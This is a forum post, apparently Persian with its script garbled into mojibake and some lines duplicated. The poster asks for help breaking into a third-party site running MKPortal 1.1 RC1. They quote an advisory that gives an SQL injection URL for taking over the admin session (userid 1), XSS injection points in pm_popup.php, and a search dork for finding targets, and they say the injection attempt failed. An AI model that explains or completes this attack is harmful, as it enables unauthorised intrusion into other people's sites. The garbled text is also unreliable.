با سلام خدمت دوستان گلم...
يه سايت هست كه با اين MKPortal MKPortal 1.1 RC1 ساخته شده... براي اكسپلويتي واسه Ù†Ùوذ كردن سرچ كردم 2 تا چيز پيدا كردم:
سعي كردم با http://[victim]/[mkportaldir]/index.php?ind=',userid='1 كاري كنم اما نتونستم...
دوميش رو هم كه نمي Ùهمم...
ميشه لط٠كنين يه ØªÙˆØ¶ÙŠØ Ø®ÙˆØ¨ Ùˆ ÙˆØ§Ø¶Ø Ø¨Ø¯ÙŠÙ†ØŸ
ممنونتونم...
يه سايت هست كه با اين MKPortal MKPortal 1.1 RC1 ساخته شده... براي اكسپلويتي واسه Ù†Ùوذ كردن سرچ كردم 2 تا چيز پيدا كردم:
کد PHP:
Vendor: MKPortal (http://www.mkportal.it/)
Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)
About: Via this methods remote attacker can inject arbitrary SQL queries to ind parameter in index.php of MKPortal.
Vulnerable code can be found in the file mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it easy to
by pass this SQL update function.
Also there is cross-site ******ing vulnerability in pm_popup.php the parameters u1,m1,m2,m3,m4 did not sanitized properly.
Level: Critical
---
How&Example:
SQL Injection :
GET -> http://[victim]/[mkportaldir]/index.php?ind=[SQL]
EXAMPLE -> http://[victim]/[mkportaldir]/index.php?ind=',userid='1
So with this example remote attacker updates his session's userid to 1 and after refreshing the page he can logs as userid 1.
XSS:
GET -> http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]
---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
Click here and get exploit for this advisory
---
Dorks: "MKPortal 1.1 RC1"
دوميش رو هم كه نمي Ùهمم...
ميشه لط٠كنين يه ØªÙˆØ¶ÙŠØ Ø®ÙˆØ¨ Ùˆ ÙˆØ§Ø¶Ø Ø¨Ø¯ÙŠÙ†ØŸ
ممنونتونم...
Comment